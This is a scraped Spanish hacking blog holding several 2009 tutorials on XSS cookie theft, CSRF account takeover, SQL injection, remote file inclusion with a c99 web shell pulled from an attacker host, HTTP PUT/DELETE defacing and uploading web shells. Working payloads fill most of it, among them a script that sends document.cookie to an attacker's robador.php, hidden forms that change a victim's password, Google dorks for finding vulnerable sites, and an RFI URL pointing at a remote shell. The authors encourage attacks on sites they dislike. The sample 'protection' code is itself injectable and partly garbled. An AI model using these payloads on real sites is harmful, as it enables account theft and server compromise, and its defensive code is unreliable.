<br />
<br /><div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;"><script>self.location='e);"target=" _blank">http://TuWeb.com/robador.php?c='+scape(document.cookie)</script></pre></div>
<br />Y Tachan! tienes la cookie...
<br />
<br />Bueno antes que nada les dire lo SCRIPT KIDDIE y BUENO de este metodo:
<br />
<br />1. SCRIPT KIDDIE: Usar este metodo contra webs de Hacking
<br />2. NO-LAMMER: Usar contra sites malos como: Porno, Pedofilia, Estafadores, Enemigos, EMOS!!!, etc..
<br />3. SCRIPT KIDDIE: Aprender este metodo unicamente sin saber como funciona
<br />4. NO-LAMMER: Aprender JAVASCRIPT, HTML y PHP
<br />5. MEDIO: Usarla para Phishing [Es malo y es bueno xD, pero no es lammer]
<br />5. SCRIPT KIDDIE: Hacking MSN -.-"
<br />
<br />Ahora pasaremos a hablar del CSRF clasico:
<br />
<br />- XSRF/CSRF Clasico
<br />
<br />Bueno ahora usaremos una forma de XSRF clasico, pero no de robo si no de CAMBIO de datos, que seria primero como dije probar si el server es vulnerable a JAVASCRIPT, o si no filtra bien el contenido de los BBCODES, o los inputs mal programados, o tambien podriamos atacar normal, sin que el usuario sepa que es un ataque.
<br />
<br />Podriamos atacar sin que la victima sepa que es malo asi (dependiendo de la pagina):
<br />
<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><form action="formulario" action="http://victima.com/perfil.php" method="POST">
<br /><input type="hidden" name="email" value="tuemail@hotmail.com">
<br /><input type="hidden" name="passwirdl" value="minuevopassword">
<br /><input type="hidden" name="submit" value="enviar">
<br /><script>document.submit();</script>
<br /></pre></div>
<br />Como dije depende de la web, SI EL SITE NO TIENE AL CAMBIAR DATOS, REPITE EL EMAIL o CONTRASEÑA es vulnerable y tambien de los input "name=NOMBRE" del site. La victima no sabe que le hemos cambiado el email...
<br />
<br />Tambien si al cambiar datos salga un link como este:
<br />
<br /><div class="quoteheader">Citar</div><div class="quote"><a href="http://www.web.com/perfil.php?user=NOMBREUSUARIONUEVO&mail=minuevomail@hotmail.com&pass=minuevopass" target="_blank">http://www.web.com/perfil.php?user=NOMBREUSUARIONUEVO&mail=minuevomail@hotmail.com&pass=minuevopass</a></div>
<br />Es super hiper mega vulnerable ya que notamos que no dice en el link a cambiar: PASSANTERIOR o EMAILANTERIOR... y que pasa si le mandamos un MP (Mensaje Privado) depende claro si es un foro con un link como este:
<br />
<br />Man vota por mi <div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;">[url=http://www.web.com/perfil.php?mail=EMAIL_DEL_ATACANTE_BUAJAJA@hotmail.com&pass=PasSCambiadoBuajaja]AQUI[/url]</pre></div>
<br />Y al hacer click en cualquiera de los ejemplos los datos han sido cambiados..
<br />
<br />Espero que les haya gustado mi parte en este bonito tutorial creado por mi bro ShadinessDark y puedan entender la diferencia entre XSS (El robo de cookies) y CSRF...
<br />
<br />Mis saludos a:
<br />
<br />ShadinessDark, KuTer, _84kur10_, k4mus23, Jeferx, D4NB4R, Darki113r, ChEk0_Hack, DestruKci0oN, Xianur0, Zer0 Z0orG, Zer0-R00t, x_jeshua, ZH4RK, zonithack, Bashettzx, Crazyhacker16, krisium, tkdead, MaNditOo, loreValdy, wscalle1 y todos mis grandes amigos =P...
<br />
<br />Saludos a Pandora's Box Team..
<br />
<br /><span style="color: red;"><b>5.)Testeando vulnerabilidad CSRF y programas el code vulnerable</b></span>
<br />
<br />Los ataques csrf lo reproducen por etiquetas HTML/JAVASCRIPT o una
<br /> Imagen, daré un breve ejemplo:
<br />
<br />Un ejemplo nos envían un correo electrónico o un MP en algún foro cuyo propósito
<br />Del atacante es que al darle clic realiza una solicitud a una URL del atacante les Mostrare un ejemplo:
<br />
<br />Por ejemplo usando una imagen src.
<br /><img src="<a href=" target="_blank" />http://Www.xD.com/?Comando</a>">
<br />
<br />Script
<br /><script src="<a href=" target="_blank">http://Www.xD.com/?Comando</a>">
<br />
<br />Casi siempre se usan los IFRAME
<br />
<br /><iframe src="<a href=" target="_blank">http://Www.xD.com/?Comando</a>">
<br />
<br />Los ejemplos de arribas son dados con HTML ahora les doy el ejemplo de los de Javascript
<br />
<br /><script>
<br />var foo = new Image(); var foo = new Image ();
<br />foo.src = "<a href="http://www.xd.com/?Comando" target="_blank">http://Www.xD.com/?Comando</a>";</script>
<br />
<br />También se puede hacer por XHTML pero hay que usar IE y bueno esa no se las explicare en este tutorial y si quieren me avisan y bueno lo modifico, Claro que existen muchas formas Vbscript – Actionscript – HTML – Javascript - JScript y otros que utilizan de marcado en los navegadores de los usuarios que hacen
<br />Realizar peticiones REMOTAS.
<br /><span style="color: red;"><b>
<br />¿Cambiando datos de la victima? </b></span>
<br />
<br />Bueno este breve codigo es solo un pequeño ejemplo:
<br />
<br /><script>
<br />var post_data = 'name=value'; post_data var = 'nombre = valor';
<br />var xmlhttp=new XMLHttpRequest(); var xmlhttp = new XMLHttpRequest ();
<br />xmlhttp.open("POST", '<a href="http://www.xd.com/path/file.ext" target="_blank">http://www.xD.com/path/file.ext</a>', true); xmlhttp.open ( "POST", "<a href="http://www.xd.com/path/file.ext" target="_blank">http://www.xD.com/path/file.ext</a> ', true);
<br />xmlhttp.onreadystatechange = function () { xmlhttp.onreadystatechange = function () (
<br />if (xmlhttp.readyState == 4) if (xmlhttp.readyState == 4)
<br />{ (
<br />alert(xmlhttp.responseText); alert (xmlhttp.responseText);
<br />} )
<br />}; );
<br />xmlhttp.send(post_data); xmlhttp.send (post_data);
<br /></script> </ script>
<br />
<br />Como podemos ver en este código hacemos una petición a POST
<br />Acuérdense que arriba les comente que cuando el atacante usa un código
<br />Malicioso hace una petición en Get. Post y HTTP ¿Se acuerdan? Espero y me vayan entendiendo...
<br />
<br /><span style="color: red;"><b>¿A dónde se dirige esta petición?</b></span>
<br />
<br />Bueno esta petición se dirige a la base de datos del sitio me explico
<br />Cada vez que hacemos cambios extremos en nuestro perfil todo pasa
<br />Por una base de datos bueno cuando la victima le da clic a la url enviada
<br />Por el atacante hace una petición en la base de datos y cambia los datos de la cuenta
<br />De la victima de confianza por el atacante ¿Me van entendiendo a que se debe este ataque?
<br />
<br /><span style="color: red;"><b>7.) Sacando una conclusión a todo.</b></span>
<br />
<br />Mirando la lógica a todo este ataque se basa en un código malicioso que es muy usado, HTML Y Javascript.
<br />
<br />Es un tipo de ataque que por parte de HTML usamos la etiqueta src y en javascript Usamos la misma etiqueta este ataque es basado en darle clic a un vinculo al Redireccionar la Web y cargar cambia la información que de nuestro usuario.
<br />Haciendo una petición en la base de datos del código del atacante…
<br /><span style="color: red;"><b>
<br />8.) Como cuidar nuestra Web de este tipo de ataques</b></span>
<br />
<br />Primero que nada vamos a nuestro FTP introducimos nuestros datos y entramos a la Carpeta public_html o donde este el archivo index.php le añadiremos algo que diga
<br />‘Actualcontraseña’ Antes de seguir el código que pondré es sacado de la siguiente pagina <a href="http://foros.hackerss.com/lofiversion/index.php/t8392.html" target="_blank">De aquí </a>
<br />
<br />Después que estemos en el index.php introduciremos este código con el Actualcontraseña esto tiene que ir dentro de <b><?php…</b>
<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><form method="POST" action="datos.php" name="datos">
<br /> Usuario <input type="text" name="usuario">
<br /> Email <input type="text" name="email">
<br /> Contraseña <input type="text" name="contraseña">
<br /> Email alternativo: <input type="text" name="emailalternativo">
<br /> Contraseña Actual: <input type="text" name="actualcontraseña">
<br /> <input type="submit" name="submit" value="cambiardatos">
<br /> </form></pre></div>
<br />Luego buscamos el archive que se llama Config.php lo pueden encontrar
<br />Por el mismo FTP y le agregamos lo siguiente:
<br />
<br /><div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><?php
<br />
<br />$bd_host </span><span style="color: rgb(0, 119, 0);">= </span><span style="color: rgb(221, 0, 0);">"localhost"</span><span style="color: rgb(0, 119, 0);">;
<br /></span><span style="color: rgb(0, 0, 187);">$bd_usuario </span><span style="color: rgb(0, 119, 0);">= </span><span style="color: rgb(221, 0, 0);">"user"</span><span style="color: rgb(0, 119, 0);">;
<br /></span><span style="color: rgb(0, 0, 187);">$bd_password </span><span style="color: rgb(0, 119, 0);">= </span><span style="color: rgb(221, 0, 0);">"pass"</span><span style="color: rgb(0, 119, 0);">;
<br /></span><span style="color: rgb(0, 0, 187);">$bd_base </span><span style="color: rgb(0, 119, 0);">= </span><span style="color: rgb(221, 0, 0);">"bd"</span><span style="color: rgb(0, 119, 0);">;
<br />
<br /></span><span style="color: rgb(0, 0, 187);">$con </span><span style="color: rgb(0, 119, 0);">= </span><span style="color: rgb(0, 0, 187);">mysql_connect</span><span style="color: rgb(0, 119, 0);">(</span><span style="color: rgb(0, 0, 187);">$bd_host</span><span style="color: rgb(0, 119, 0);">, </span><span style="color: rgb(0, 0, 187);">$bd_usuario</span><span style="color: rgb(0, 119, 0);">, </span><span style="color: rgb(0, 0, 187);">$bd_password</span><span style="color: rgb(0, 119, 0);">); </span><span style="color: rgb(0, 0, 187);">mysql_select_db</span><span style="color: rgb(0, 119, 0);">(</span><span style="color: rgb(0, 0, 187);">$bd_base</span><span style="color: rgb(0, 119, 0);">, </span><span style="color: rgb(0, 0, 187);">$con</span><span style="color: rgb(0, 119, 0);">);
<br />
<br /></span><span style="color: rgb(0, 0, 187);">?></span></span></pre></div>
<br />En el archive datos.php usaremos lo siguiente:
<br />
<br /><div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;"><?
<br />
<br />include('config.php');
<br />
<br /> session_start();
<br /> if(isset($_REQUEST['usuario']))
<br /> $usuario = $_REQUEST['usuario'];
<br /> else
<br /> die("Rellene el campo Usuario");
<br /> if(isset($_REQUEST['email']))
<br /> $email = $_REQUEST['email];
<br /> else
<br /> die("Rellene el campo email");
<br /> if(isset($_REQUEST['contraseña']))
<br /> $contraseña = $_REQUEST['contraseña];
<br /> else
<br /> die("Rellene el campo Contraseña");
<br /> if(isset($_REQUEST['emailalternativo']))
<br /> $emailalternativo = $_REQUEST['emailalternativo];
<br /> else
<br /> die("Falta el email alternativo");
<br /> if(isset($_REQUEST['actualcontraseña']))
<br /> $actualcontraseña = $_REQUEST['actualcontraseña];
<br /> else
<br /> die("Especifique la contraseña");
<br />
<br />if ($actualcontraseña==NULL) {
<br />echo "Especifique su contraseña Actual";
<br />
<br />}else{
<br />
<br />$query = mysql_query("SELECT usuario,actualcontraseña FROM myhosting_usuarios WHERE username = '$usuario'") or die(mysql_error());
<br />$data = mysql_fetch_array($query);
<br />if($data['contraseñaa'] != $actualcontraseña) {
<br />echo "Contraseña Actual Inavalida";
<br />}else{
<br />
<br /> CambiarDatos($usuario, $email, $contraseña, $emailalternativo);
<br />
<br /> ?></pre></div>
<br />Ahora vamos a nuestro panel entramos a PHPMYADMIN ósea a nuestro phpmyadmin
<br />Y le damos donde dice Consulta y introducen el siguiente código:
<br /><div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;">CREATE TABLE `myhosting_usuarios` (
<br /> `id` int(11) NOT NULL auto_increment,
<br /> `usuario` varchar(15) NOT NULL,
<br /> `email` varchar(15) NOT NULL,
<br /> `emailalternativo` varchar(15) NOT NULL,
<br /> `contraseña` varchar(150) NOT NULL,
<br /> `contraseñaa` varchar(150) NOT NULL,
<br /> KEY `id` (`id`)
<br />) ENGINE=MyISAM;
<br />
<br />INSERT INTO `myhosting_usuarios` VALUES (1, 'SecurityKill', 'mymail@gmail.com', 'mymail2@gmail.com', 'mypass', 'mypass');</pre></div>
<br />
<br />9.) Despedida
<br />
<br />Bueno señores ya hemos terminado este tutorial quizás muchos no entendieron
<br />Y otros si me entendieron traten de hacer lo mejor por dar una buena explicación
<br />Pero recuerden que no todo se pone tan fácil, Bueno en este tutorial compartí gran
<br />Parte con mi hermano zero bits que su parte quedo maravillosa lo se porque lo lei
<br />Me gustan las críticas así que espero las críticas tutorial escrito a mano todo los derechos del autor reservados y los códigos no todos son nuestros por eso hemos
<br />Puesto en algunos la fuente les deseo un gran fin de semana…
<br />
<br />No pongo mi sitio Web porque siempre los Web Master andan con el trauma de que
<br />Hacemos Spam como si con eso piensan que acabaran el Spam sueñen un rato…
<br />
<br />Group’s Ethical.
<br />
<br />Zero Bits
<br />KuTer
<br />Jeferx
<br />Darki113r
<br />_84kur10_
<br />ShadinessDark
<br />
<br />Mi team V1rtu@l VIRu$ Bl@ck Team ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-63009685148108415592009-09-28T06:13:00.000-07:002009-09-28T06:14:11.016-07:00Ataque SQL y ejemplos PHP By shadinessdark¿Qué es la injection SQL?<br /><br />Bueno digamos que es un truco para inyectar comandos SQL en un sitio Web<br />OH hacer una consulta como un insumo, Principalmente el atacante la hace en la<br />Forma de método GET – POST la mayoría de los sitios de parámetros hace una Consulta SQL en la base de datos digamos que tenemos una pagina de detalles<br />Con un producto en PHP que toma un parámetro product_id de un método GET <br />Y obtiene el detalle de la base de datos una consulta SQL con el ataque de Injection SQL, Un atacante puede enviar una consulta SQL diseñada desde la dirección URL, De<br />La pagina de detalles del producto se recuerdan el product_id bueno la consulta la hace<br />Desde hay con eso podría hacer mucho daño a la base de datos, Podría incluso eliminar la tabla de base de datos…<br /><br />Para saber mas sobre SQL pueden acceder a <a href="http://es.wikipedia.org/wiki/SQL" target="_blank">Aqui...</a><br /><br />¿Método de ataque SQL injection en PHP?<br /><br />Casi siempre la consulta habitual de sesión de un usuario en php es:<br /><br /><div class="codeheader">Código:</div><div style="overflow: scroll;" class="code"><pre style="margin-top: 0pt; display: inline;">$ sql = "SELECT * FROM tbl_user WHERE username ='".$_ POST [ '']."' Aquí el nombre de usuario y la contraseña='".$_ POST [' password']."'";<br />$result=mysql_query($sql); $ resultado = mysql_query ($sql);</pre></div><br />Bueno muchos de UDS.<br />Piensan que el usuario solo puede iniciar sesión validad en el interior del servidor pero eso seria True.Well nadie podría acceder a la pagina con un simple truco vamos a suponer que yo soy el Atacante me llamo ShadinessDark inyecto X 'o' x '=' x en el campo de nombre y usuario y En el campo de contraseña entonces lo final seria asi:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">X '=' x 'y password =' x tbl_user SELECT * FROM WHERE username = 'x' o 'o' x '=' x '; </pre></div><br />Como se puede veer la consulta la acepta Como cierto y nos devuelve la fila de la base de datos como resultado, el atacante puede iniciar sesión en el sistema como root…<br /><br />En el ataque de SQL un atacante puede incluso caer de una tabla de base de datos claro si el usuario tiene Permiso DROP en la base de datos…<br /><br />Un ejemplo de consulta de una pagina con detalle de producto:<br /><br />$ sql = "SELECT * FROM producto WHERE id_producto ='".$_ GET [ 'id_producto']."'";<br /><br />Ahora el atacante inyecta comandos SQL en la URL de la pagina el código podría ser Así 11 '; del DROP TABLE producto; # se vería algo así:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">http://xD.com/producto.php?id=11 '; Producto ; #</pre></div><br />Ahora la consulta se convertiría en la siguiente forma:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">SELECT * FROM productos WHERE id_producto = '11 '; Producto ; #';</pre></div><br />Muchos se preguntan que hace el ‘#’ ya que en lenguajes como perl es solamente un Simple comentario esta consulta ‘#’ simplemente ignora las comillas simple pasadas (‘) de la consulta…<br /><br />Ósea ignora el resto de las queray.in…<br /><br />By ShadinessDark<br />Dedicación: BugDox<br />Team: V1rtu@l VIRu$ Bl@ck Team<br /><br />Group’s Ethical.<br />Zero Bits<br />KuTer<br />Jeferx<br />Darki113r<br />_84kur10_<br />ShadinessDark<br /><br /><span style="color: red;"><b>{Las criticas son importantes para arreglar mis errores}</b></span>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-78499645189857050292009-09-28T06:12:00.000-07:002009-09-28T06:13:36.357-07:00[Tutorial] RFI By ShadinessDark<div align="center"><img src="http://www.ethicalhacker.net/images/stories/vitals/bhcircle2.gif" alt="" border="0" /></div><br /><div align="center"><b>Tutorial remote file inclusion</b></div><br />1.) Presentación<br /><br />2.) Que es RFI<br /><br />3.) Dorks RFI<br /><br />4.) Testeando la vulnerabilidad<br /><br />5.) Sacando una conclusión a todo<br /><br />6.) Como cuidar nuestra Web de este tipo de ataques<br /><br />7.) Despedida<br /><br /><br /><span style="color: red;"><b>1.) Presentación</b></span><br /><br />Primero que nada este tutorial va dedicado a mis amigos de BugDox y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial<br />Para dar la diferencia de otros tutoriales que he visto en la red…<br /><br />¿Por qué diferente?<br /><br />Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados<br /><br />¿A que se debe este tutorial?<br /><br />Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo<br />No es mi culpa que un Web Master no me haga caso ¿Verdad?<br /><br />Los saludos más especiales para mis compañeros:<br /><br />Zero Bits<br />KuTer<br />Jeferx<br />Darki113r<br />_84kur10_<br />Z1z30f<br />Kozmic.Kizz<br />Zonithahack<br />3mp3z@nd0<br /><br /><span style="color: red;"><b>2.) Que es RFI</b></span><br /><br />RFI tiene como nombre Remote File Inclusión en español inclusión remota de archivo<br />Como ya saben que dice en la wikipedia esta vulnerabilidad se encuentra en páginas<br />Dinámicas ósea echas en PHP no en todo tipo de Web como saben siempre es depende<br />Del buen programador esta vulnerabilidad se encuentra en include() casi siempre<br />Buscamos en los códigos de fuentes por eso es bueno estar pendiente de nuestra Programación cuando tenemos un sitio Web, Un atacante puede inyectar su código<br />En un programa PHP en su servidor, Cuando acceden al servidor pueden acceder a Cualquier que tiene el programa PHP por ejemplo:<br /><br />Base de datos<br />Archivos de contraseña<br />Y otras cosas<br /><br />Pueden instalar sus propios servidores que lo ejecutan con los privilegios de la victima<br />Del servidor Web como {apache o httpd} Y si el servidor no lo han modificado en algunos locales de la vulnerabilidad de escalada de privilegios el atacante que monto<br />La shell puede ser usada para convertirse en root… <br /><br /><span style="color: red;"><b>3.) Dorks RFI</b></span><br /><br />Con un dork podemos conseguir las vulnerabilidades al azar con solo visitar<br />Www.Google.com y poner lo siguiente:<br /><br /><br />/index.inc.php?PATH_Includes=<br /><br />/ashnews.php?pathtoashnews=<br /><br />Uno de estos dos les servirá si no visiten <a href="http://foro.eduhack.es/bugs-y-exploits/dorks-rfi/?wap2" target="_blank">Aqui</a><br /><br /><span style="color: red;"><b><br />4.) Testeando la vulnerabilidad</b></span><br /><br />Bueno ya hemos encontrado una Web ahora vamos a testearla haber si es vulnerable<br />Primero que nada muchas veces esto se encuentra con solo revisar en los códigos de Fuente siempre se encuentra lo siguiente:<br /><br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(0, 0, 187);"><?php<br /><br /> </span><span style="color: rgb(0, 119, 0);">include</span><span style="color: rgb(221, 0, 0);">"#bugdox"</span><span style="color: rgb(0, 119, 0);">;<br /><br /></span><span style="color: rgb(0, 0, 187);">?></span></span></pre></div><br />Recordemos que esta vulnerabilidad se presenta cuando se intenta meter una página<br />Remota adentro de la otra y se utilizan lo códigos que di como ejemplo cuando se Encuentra la Vulnerabilidad.include() lo que hace es incluir una pagina remota por ejemplo $Bugdox<br /><br />Se puede utilizar una url bajo argumento y eso es lo que hace explotar RFI por ejemplo:<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">http://vulnerable.com/badcode?ejemplo= </pre></div><br />tenemos ?ejemplo.php cuando el atacante introduce su codigo malicioso.<br /><div class="quoteheader">Citar</div><div class="quote"><a href="http://vulnerable.com/badcode?ejemplo=http://Www.xD.com/c99.jpg" target="_blank">http://vulnerable.com/badcode?ejemplo=http://Www.xD.com/c99.jpg</a> <br /><br /><a href="http://www.xd.com/" target="_blank">Www.xD.com</a> es la Web donde subí mi SHELL con el nombre c99.jpg</div><br />Al ejecutar esto en la Web de la victima ¿Qué pasa? No recoge ejemplo.php<br />Si no que el sistema agarra la url maligna que es la que le da una CONEXIÓN REMOTA que es cuando introducimos nuestra shell ¿Me entienden?.Un atacante<br />Puede saber controlar las variables de PHP se hace mediante:<br /><br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">mis-PHP register_globals función.</pre></div><br />Cuando register_globals esta habilitado en PHP el lenguaje automagicamente<br />Hace una instancia con los valores de las variables de la petición en http, y los pone<br />En el espacio de nombres del programa PHP.<br /><br />Cuando se activa se le permite a un atacante inyectar un valor para cualquier variable Sin inicializar en cualquier programa solo el atacante añade un parámetro GET al final De la url es decir después de “=”<br /><br />Ejemplo hemos entrado en Www.xD.com hemos mirado el código de fuente<br />Hemos observado que tiene include() hacemos la prueba:<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">http://vulnerable.com/badcode?ejemplo=http://Www.google.com </pre></div><br />Resulta que al darle clic nos redirección a GOOGLE de una vez ya sabemos que la Web Es vulnerable a RFI.<br /><br />Luego que encontramos nuestra Web vulnerable buscamos nuestra SHELL<br />Ya sea c99 o r57 y hay otras mas.<br /><br />Buscamos un hosting gratuito que soporte PHP y guardamos nuestra shell en un<br />Jpg.php o con gif.php no importa el formato porque tampoco que vamos a poner<br />Cualquier formato a veces muchas Web no permiten extracciones como gif y otras…<br /><br /><span style="color: red;"><b>5.) Sacando una conclusión a todo </b></span><br /><br />Como pueden ver la lógica rfi no es muy difícil es un ataque muy básico<br />Trata de que <a href="http://www.xd.com/" target="_blank">www.xD.com</a> es la Web vulnerable bugdox.php esta es la que<br />Incluirá el redireccionamiento ?ejemplo= Esta es la que le permite a un atacante<br />Introducir códigos maliciosos por ejemplo la SHELL y <a href="http://www.xd.com/c99_jpg" target="_blank">www.xD.com/c99_jpg</a><br />Este sitio es el que almacena la shell...<br /><br /><span style="color: red;"><b> 6.) Como cuidar nuestra Web de este tipo de ataques</b></span><br /><br />Para evitar este tipo de ataques en nuestros sitios podemos ir al FTP y buscar<br />La configuración index.php lo editamos y agregamos lo siguiente:<br /><br />Antes de continuar este CODIGO de seguridad no es hecho por mi lo pueden ver<br /><a href="http://foro.code-makers.es/index.php?topic=2021.0" target="_blank">Aquí</a>…<br /><br />Codigo:<br /><br />if (file_exists($_GET['id'].".php")) {<br />include ($_GET['id'].".php");<br />} else {<br />echo "El acceso a este lugar lo tiene denegado o no existe";<br />}<br /><br />Ejemplo de codigo:<br /><br />echo "El acceso a este lugar lo tiene denegado o no existe";<br /><br />Este if funciona de la manera que si al colocar:<br /><br /><a href="http://vulnerable.com/badcode?ejemplo=http://Www.google.com" target="_blank">http://vulnerable.com/badcode?ejemplo=http://Www.google.com</a><br /><br />No te redireccionara si no que te dirá El acceso a este lugar lo tiene desnegado o no Existe pero si por ejemplo agregamos:<br /><br /><a href="http://vulnerable.com/badcode?ejemplo=BugDox" target="_blank">http://vulnerable.com/badcode?ejemplo=BugDox</a><br /><br />Y si existe pasara normalmente sin dar el error para que no de el Error este archivo debe existir.<br /><br />7.) Despedida<br /><br />Otro tutorial mas que hago no es la gran cosa a lo mejor tengo errores por hay<br />Si los tengo me gustarian las {Criticas} Son muy importante para correjir a los<br />Demas...<br /><br />No pongo mi sitio Web porque siempre los Web Master andan con el trauma de que<br />Hacemos Spam como si con eso piensan que acabaran el Spam sueñen un rato…<br /><br />Group’s Ethical.<br /><br /><b>Zero Bits<br />KuTer<br />Jeferx<br />Darki113r<br />_84kur10_<br />ShadinessDark</b><br /><br />Mi team V1rtu@l VIRu$ Bl@ck Team<br />By ShadinessDarkShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-57358535419798431152009-09-28T06:11:00.002-07:002009-09-28T06:12:51.361-07:00Introduccion al HTTP Hacking By Zero Bits<span style="color: red;">Introducción al HTTP Hacking</span><br /><br />Este solo es una mera introduccion al HTTP Hacking hablando de los metodos y algunos ejemplos de como funcionan. Antes lean esto:<br /><br /><a href="http://es.wikipedia.org/wiki/Hypertext_Transfer_Protocol" target="_blank">HTTP</a><br /><a href="http://es.wikipedia.org/wiki/Headers" target="_blank">Headers</a><br /><br />Ya que leyeron, explicare los metodos HTTP....<br /><br /><b><span style="color: red;">Metodos HTTP:</span></b><br /><br /><b>GET:</b> Viene activado por defecto, puede obtener info de un fichero y tambien solicita una pagina.<br /><br /><b>HEAD:</b> El server devuelve los headers de la pagina, gracias a eso podemos sacar buena info del Servidor.<br /><br /><i>Ej:</i> Vamos a usar el MS-DOS con google.co.ve<br /><br />Abromps el MS-DOS y escribimos "nc <a href="http://www.google.co.ve/" target="_blank">www.google.co.ve</a> 80", se conectara en la linea de abajo de eso, escribimos: HEAD / HTTP/1.1, le damos dos veces a ENTER para confirmar y nos tira informacion como esta:<br /><br /><div align="center"><img src="http://i30.tinypic.com/al5kli.gif" alt="" border="0" /></div><br /><i>Cache-Control:</i>Directivas que deben ser usadas a lo largo de la peticion<br /><i>Content-Type:</i>Con lo que salio, deben imaginarse<br /><i>Set-Cookie:</i>La cookie<br /><br /><br />Nos puede dar esa o mejor Informacion, depende del Servidor...<br /><br /><b>OPTIONS:</b> Aqui esta otro que nos da mucha info, tambien informa de los metodos permitidos por el Servidor.<br /><br /><i>Ej:</i> Probemos con E-R00T.ORG este metodo xD:<br /><br /><div align="center"><img src="http://i26.tinypic.com/2eb4b2h.gif" alt="" border="0" /></div><br />Podemos ver que info que sabran que es como <b>DATE</b> <i>(La fecha actual)</i>, <b>Server</b> <i>(Me imagino que ya sabran con lo que leyeron xD)</i>, <b>Content-Length</b> <i>(Numero de caracteres)</i>, pero para quienes no conocen a <b>ALLOW</b>, dice los metodos permitidos por el Servidor, entonces aqui se permiten <i>GET, HEAD, POST, OPTIONS y TRACE</i>.<br /><br /><b>TRACE:</b> Responde lo que le enviemos, podremos aprovecharnos de esa haciendo XSS o cualquier otra cosa como Floodearlo...<br /><br /><i>Ej:</i><br /><br /><div class="quoteheader">Citar</div><div class="quote"><div align="center">nc <a href="http://www.web.com/" target="_blank">www.web.com</a></div><div align="center">TRACE / HTTP/1.0</div><div align="center"><script>alert("Probando TRACE")</script></div></div><br />Netcat dira si se llego a lograr o no...<br /><br /><b>POST:</b> Podemos hacer que el servidor acepte informacion enviada por nosotros.<br /><br /><i>Ej:</i> Podemos hacer que un uploader acepte una imagen con contenido malicioso.<br /><br /><b>PUT:</b> Cuando vean que el servidor acepte PUT, leyendo esto puede que se emocionen, ya que PUT permite modificar un fichero.<br /><br /><i>Ej:</i><br /><br /><div class="quoteheader">Citar</div><div class="quote">PUT /index.html HTTP/1.0<br />Content-Length: 14<br /><h1>Owned</h1></div><br /><i>Content-Length</i>, es el numero de caracteres....<br /><br />Dependiendo de si funciona o no, te lo dira... A veces piden autorizacion, dependiendo de la seguridad, solo ahi que poner la IP o nombre del Servidor.<br /><br /><b>DELETE:</b> Borra un fichero.<br /><br /><i>Ej:</i><br /><br />nc <a href="http://www.web.com/" target="_blank">www.web.com</a> 80<br />DELETE /index.html HTTP/1.0<br /><br />Bueno ya hemos terminado esta breve Introduccion al Http Hacking...<br /><br />Pueden leer tutos:<br /><br />* Aprende a usar Live http Headers<br /><br />* HTTP al Descubierto By Sknight & Vengador de las Sombras<br /><br /><b>Autor:</b> Zero Bits<br /><b>Fecha:</b> 24/07/09<br /><b>Team:</b> Pandoras Box TeamShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-47249666245537069052009-09-28T06:11:00.001-07:002009-09-28T06:12:10.324-07:00Tips (PhpShells) que son y como subirlas by _84kur10_Saludos a todos.<br />el tutorial esta basico, pero creo que a muchos les serviria :D<br /><br />bueno el contenido de este minututorial es<br /><br /><br /><div align="center"><span style="color:red;"><b>Tips a la hora de usar shells + otras cuantas cosas</b></span></div><br /><span style="color:red;">0x01</span> Q son la shells.<br /><span style="color:red;">0x02</span> PhpShells<br /><span style="color:red;">0x03</span> Creacion de PhpShells<br /><span style="color:red;">0x04</span> Subir una shell a un servidor<br /><span style="color:red;">0x05</span> Ya subi la shell y ahora?<br /><span style="color:red;">0x06</span> Preparando el sistema para volver (Keylogger php) o (POSTlogger php)<br /><span style="color:red;">0x07</span> Dejar shell incrustada (Shell Embedded)<br /><span style="color:red;">0x08</span> Preguntas en otros foros sobre este tuto<br /><span style="color:red;">0x09</span> Conclusion<br /><span style="color:red;">0x10</span> Agradecimiento<br /><br /><span style="color:red;"><b><br />0x01 Shell</b><br /></span><br />A una shell como tal la podemos definir como el software que permite que el usuario acceda a los servicios del sistema sin ir directamente al kernel, si no precisamente a travez de la shell, en otras palabras la shell sera una intermediaria entre el usuario y el sistema.<br /><br /><span style="color:red;"><b><br />0x02 PhpShell (WebShell)<br /></b></span><br /><br />Bueno en este orden de ideas podemos entonces decir que una phpShell es un intermediario entre el sistema y el usuario, con la particularidad que esta desarrollada en php, asi como hay shells hechas en php, tambien existen en un sin fin de lenguajes de programacion, la ventaja de q la shell este hecha en php o en algun lenguaje de programacion para la web, es q podremos usar la shell aprovechando los servicios de la maquina remota.<br /><br 